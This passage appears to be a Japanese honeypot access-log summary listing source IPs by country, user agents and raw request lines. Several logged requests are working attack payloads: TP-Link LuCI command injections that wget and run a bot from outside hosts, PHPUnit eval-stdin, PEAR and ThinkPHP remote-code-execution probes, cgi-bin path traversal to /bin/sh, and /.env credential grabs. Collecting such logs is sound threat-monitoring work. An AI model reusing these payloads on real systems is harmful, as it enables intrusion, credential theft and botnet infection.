1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-content/plugins/elementor/readme.txt`	HTTP/1.1
2	PRI	`*`	HTTP/2.0
1	t3	`12.1.2\n`

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	20.3.243.249	United States
34	23.94.57.28	United States
2	45.33.80.243	United States
1	45.79.181.94	United States
2	45.79.181.223	United States
1	45.84.89.2	Bulgaria
14	45.148.10.174	Romania
43	47.245.32.141	United States
5	51.159.103.17	France
1	52.76.71.100	United States
3	54.36.115.221	France
3	54.37.79.75	France
5	57.129.23.166	France
1	64.62.197.6	United States
1	64.62.197.12	United States
1	64.62.197.16	United States
1	64.62.197.177	United States
1	66.175.213.4	United States
4	71.6.146.185	United States
1	80.66.76.130	Russia
2	83.97.73.245	Germany
1	94.156.67.234	Bulgaria
43	103.162.36.154	Indonesia
4	104.248.19.239	United States
2	115.231.78.3	China
6	118.193.43.141	Hong Kong
1	121.11.105.43	China
1	134.209.30.87	United States
1	134.209.237.64	United States
2	138.68.73.114	United States
1	138.68.103.96	United States
1	139.59.151.131	Singapore
2	141.98.11.79	Lithuania
1	142.93.33.19	United States
2	147.185.132.64	United States
2	165.22.54.194	United States
6	165.154.36.105	Hong Kong
2	167.71.202.190	United States
1	167.94.146.53	United States
3	167.99.251.99	United States
2	176.144.241.157	France
1	185.180.140.5	Portugal
20	185.191.127.212	Seychelles
2	185.224.3.4	Turkey
1	192.155.90.118	United States
2	198.235.24.17	United States
2	199.45.154.152	United States
2	199.45.155.65	United States
1	204.8.98.95	United States
1	207.167.66.182	United States

UserAgent一覧

件数	UserAgent
30	`-`
121	`Custom-AsyncHttpClient`
48	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 8.0.0; HTC U11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
11	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
4	`Mozilla/5.0 (compatible; Odin; https[:]//docs[.]getodin[.]com/)`
2	`Mozilla/5.0`
1	`curl/7.81.0`
2	`python-requests/2.32.3`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
1		`\x16\x03\x01\x01$\x01`
1		`\x16\x03\x01\x01\x03\x01`
2		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\xfb\x01`
17		`\x16\x03\x01`
1		``
2	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`pro.ip-api[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]google[.]com:443`	HTTP/1.1
13	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?%3Cplay%3Ewithme%3C/%3E`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/HNAP1/`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
3	GET	`/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
3	GET	`/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/ads.txt`	HTTP/1.1
3	GET	`/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/app-ads.txt`	HTTP/1.1
2	GET	`/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/axis2-admin/`	HTTP/1.1
2	GET	`/axis2/`	HTTP/1.1
2	GET	`/axis2/axis2-admin/`	HTTP/1.1
3	GET	`/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
7	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45[.]148[.]10[.]78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)`	HTTP/1.1
7	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60)`	HTTP/1.1
20	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]28[.]141%2Ft+-O-+\|+sh%60)`	HTTP/1.1
3	GET	`/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
9	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
2	GET	`/index.php?lang=../../../../../../../../tmp/index1`	HTTP/1.1
2	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php`	HTTP/1.1
2	GET	`/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
3	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/odinhttpcall1718850548`	HTTP/1.1
1	GET	`/owa/auth/x.js`	HTTP/1.1
2	GET	`/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
2	GET	`/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
4	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sellers.json`	HTTP/1.1
3	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/cores?action=STATUS&wt=json`	HTTP/1.1
1	GET	`/solr/admin/info/system`	HTTP/1.1
1	GET	`/swagger`	HTTP/1.1
3	GET	`/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/vendor/phpunit/phpunit/LICENSE/eval-stdin.php`	HTTP/1.1
3	GET	`/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
2	GET	`/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-content/plugins/elementor/readme.txt`	HTTP/1.1
3	GET	`/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
3	POST	`/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh`	HTTP/1.1
4	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
2	PRI	`*`	HTTP/2.0